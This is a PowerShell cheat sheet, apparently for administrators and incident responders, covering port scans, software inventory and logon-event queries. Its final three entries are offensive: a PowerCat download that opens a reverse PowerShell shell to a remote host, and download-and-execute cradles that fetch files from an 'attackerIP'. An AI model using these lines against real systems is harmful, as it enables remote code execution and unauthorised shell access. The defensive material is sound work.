Simple Ping Sweep
```powershell
2..254 | ForEach-Object { Test-Connection -ComputerName "XXX.XXX.XXX.$_" -Count 1 }
```
Each host scans for its neighbours ($ComputerList in this instance refers to a variable holding the computer names read from a text file, e.g. `$ComputerList = Get-Content .\computers.txt`). The filter drops IPv4 multicast (01-00-5E...) and broadcast (FF-FF-FF-FF-FF-FF) entries from the neighbour cache.
```powershell
$Results = Invoke-Command -ComputerName $ComputerList -ScriptBlock { Get-NetNeighbor -AddressFamily IPv4 | Where-Object { $_.LinkLayerAddress -notlike "01-00-5E*" -and $_.LinkLayerAddress -notlike "FF-FF-FF-FF-FF-FF" } }
```
Software inventory list (Can be altered to loop through a list of computers as per above)
```powershell
@("HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*") | ForEach-Object { Get-ItemProperty "$_" | Select-Object DisplayName,PSChildName,Publisher,InstallLocation }
```
Simple TCP port scan (IPv4) (1234..5678 refers to the port range; only open ports are printed)
```powershell
$ips = @("XXX.XXX.XXX.XXX","XXX.XXX.XXX.XXX")
$ips | ForEach-Object { $ip = $_; 1234..5678 | ForEach-Object { if (Test-NetConnection -ComputerName $ip -Port $_ -InformationLevel Quiet -WarningAction SilentlyContinue) { "$ip`:$_ open" } } }
```
Simple UDP port scan (IPv4) (1234..5678 refers to the port range; a port that answers the probe is printed, while an ICMP port-unreachable reply raises a SocketException on Receive and is treated as closed, and no reply within the timeout means closed or filtered)
```powershell
$ips = @("XXX.XXX.XXX.XXX","XXX.XXX.XXX.XXX")
$ips | ForEach-Object { $ip = $_; 1234..5678 | ForEach-Object {
    $UDP = New-Object System.Net.Sockets.UdpClient; $UDP.Client.ReceiveTimeout = 1000; $UDP.Connect($ip, $_)
    [void]$UDP.Send([byte[]]@(0), 1); $ep = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any, 0)
    try { [void]$UDP.Receive([ref]$ep); "$ip`:$_ responded" } catch { } finally { $UDP.Close() }
} }
```
Search for string in file recursively through folders and provide path of file
```powershell
Get-ChildItem -Recurse | Select-String "dummy" -List | Select-Object Path
```
Get Windows security events and group by ID count
```powershell
Get-WinEvent -LogName Security | Group-Object -Property Id -NoElement
```
Display all successful logons (Event ID 4624) within the last 24 hours and provide the usernames (ensure the $TargetWorkstation variable exists; Data[5] is the TargetUserName field of a 4624 event)
```powershell
Invoke-Command { Get-WinEvent -FilterHashtable @{LogName="Security";Id=4624;StartTime=$((Get-Date).AddDays(-1))} | ForEach-Object { $e=[xml]$_.ToXml(); $e.Event.EventData.Data[5] } | Select-Object -ExpandProperty "#text" | Group-Object -NoElement } -ComputerName $TargetWorkstation
```
Active Directory - Search for last logon date of specified user
```powershell
Get-ADUser -Identity username -Properties "LastLogonDate"
```
Find all local users who have logged in during the last 10 days (adjust (-10) to change days)
```powershell
Get-LocalUser | Where-Object { $_.LastLogon -ge (Get-Date).AddDays(-10) } | Select-Object Name,Enabled,SID,LastLogon | Format-List
```
Method for discovering the accounts logged into the most systems across the network, by count (ensure the $Workstations variable exists). Count and PSComputerName are kept in the final Select-Object so that the sort on Count still has something to work on.
```powershell
Invoke-Command { Get-WinEvent -FilterHashtable @{LogName="Security";Id=4624} | ForEach-Object { $e=[xml]$_.ToXml(); $e.Event.EventData.Data[5] } | Select-Object -ExpandProperty "#text" | Group-Object | Sort-Object -Property Count -Descending } -ComputerName $Workstations | Select-Object -Property Name,Count,PSComputerName | Sort-Object -Property Count -Descending
```
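As an added example (not part of the original cheat sheet), a reusable variant of the two 4624 queries above: it reads the EventData fields by name rather than by the positional Data[5] index, keeps only interactive (type 2) and remote-interactive (type 10) logons so that noisy network and service logons are excluded, and reports how many distinct hosts each account reached and from which source addresses. `$Workstations` is assumed to be the same list of computer names used above; the function name is my own.

```powershell
function Get-LogonSummary {
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,   # e.g. $Workstations from above (assumed to exist)
        [int]$Days = 1,
        [int[]]$LogonType = @(2, 10)                     # 2 = Interactive, 10 = RemoteInteractive (RDP)
    )
    $filter = @{ LogName = 'Security'; Id = 4624; StartTime = (Get-Date).AddDays(-$Days) }
    $events = Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        param($filter, $types)
        Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
            # Read EventData fields by name so the result does not depend on field order
            $d = @{}
            ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
            if ([int]$d.LogonType -in $types) {
                [pscustomobject]@{
                    Host      = $env:COMPUTERNAME
                    User      = "$($d.TargetDomainName)\$($d.TargetUserName)"
                    LogonType = [int]$d.LogonType
                    Source    = $d.IpAddress
                    Time      = $_.TimeCreated
                }
            }
        }
    } -ArgumentList $filter, $LogonType
    # One row per account: how many distinct hosts it reached, and from where
    $events | Group-Object User | ForEach-Object {
        $hosts = @($_.Group.Host | Sort-Object -Unique)
        [pscustomobject]@{
            User      = $_.Name
            HostCount = $hosts.Count
            Hosts     = $hosts -join ','
            Sources   = @($_.Group.Source | Sort-Object -Unique) -join ','
            LastLogon = ($_.Group.Time | Measure-Object -Maximum).Maximum
        }
    } | Sort-Object HostCount -Descending
}

# Usage: accounts seen on the most hosts in the last 24 hours
Get-LogonSummary -ComputerName $Workstations -Days 1 | Format-Table -AutoSize
```

An account that appears on many hosts from a single source address, or a service account with type 2 or 10 logons, is the kind of row worth following up.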
Detect randomness of filenames within a given directory (see also the Security Tools List for the Freq-PS script required for this command). Method for finding malicious files with random names.
```powershell
. C:\Scripts\freq.ps1   # Location of the freq.ps1 script (dot-sourced so Get-FrequencyScore is available)
Get-ChildItem | Get-FrequencyScore -Property Name | Select-Object -Property Name,FrequencyScore | Sort-Object -Property FrequencyScore -Unique
```
Downloading PowerCat from GitHub, then using it to open a connection to a remote server
```powershell
IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besmorhino/powercat/master/powercat.ps1'); powercat -c <REMOTEIP> -p <REMOTEPORT> -e powershell
```
The following will download and store a remote file to disk.
```powershell
Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe"
```
The following will download and automatically execute the remote PowerShell script when run from a command prompt.
```powershell
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')"
```